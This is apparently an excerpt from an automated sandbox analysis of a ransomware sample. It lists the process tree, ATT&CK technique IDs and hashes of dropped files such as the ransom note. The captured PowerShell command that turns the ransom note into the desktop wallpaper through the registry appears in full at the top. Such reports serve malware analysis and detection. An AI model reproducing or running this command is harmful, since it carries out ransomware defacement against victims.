  powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1521733757.png /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2820
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
    3⤵
    PID:3416

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
064348106157ac3e6972ebe6852f665f

SHA1
4f95549af4873637f05f5f574b93605d30a28dbb

SHA256
876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

SHA512
e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

Download Submit
C:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
064348106157ac3e6972ebe6852f665f

SHA1
4f95549af4873637f05f5f574b93605d30a28dbb

SHA256
876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

SHA512
e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

Download Submit
C:\Users\Admin\AppData\Local\Temp\1521733757.png

Filesize
32KB

MD5
0c69ddc9040a706b0ba157b490f1aeff

SHA1
0bfc69c2c03b2154461715f5f739059a8b8cd086

SHA256
c36a6abb844debeb8a3d98826cf9b5664464948b60b43e0d8f76625826b992b1

SHA512
e2a659f799cdd42031af37635b0429ef64f40519616780fcf35ff4db8f7ad102fdeda47cb1d9db3c397c208f531ceebcdf41f5314336cda8cdefb47f0c991562

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c516c1e56206056520b8ae60821654dd

SHA1
a94c103f9a4808715afc4532b24ecba6ee3a7ff0

SHA256
30cb4a859416dc6109e87ceeff5d3a226623e24dd12a50a3a67a93a96b71cdd2

SHA512
38250cd71c8c0f2b708143c17f3d40ed3626235840bd9fbb89f7671ab43d063e83d6419e59291f9c8f8be582d1e22c39e75b5555dffc4bd9b98ec92eac30cad4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C8XVUKCCJLRXF1GP2ZAX.temp

Filesize
7KB

MD5
c516c1e56206056520b8ae60821654dd

SHA1
a94c103f9a4808715afc4532b24ecba6ee3a7ff0

SHA256
30cb4a859416dc6109e87ceeff5d3a226623e24dd12a50a3a67a93a96b71cdd2

SHA512
38250cd71c8c0f2b708143c17f3d40ed3626235840bd9fbb89f7671ab43d063e83d6419e59291f9c8f8be582d1e22c39e75b5555dffc4bd9b98ec92eac30cad4

Download Submit
C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
064348106157ac3e6972ebe6852f665f

SHA1
4f95549af4873637f05f5f574b93605d30a28dbb

SHA256
876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a

SHA512
e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

Download Submit
memory/2504-1738-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/2504-1135-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/2504-1068-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/2504-699-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/2504-685-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/2788-24583-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/2788-24584-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/2788-24587-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download
memory/2788-24585-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download
memory/2788-24588-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download
memory/2788-24589-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download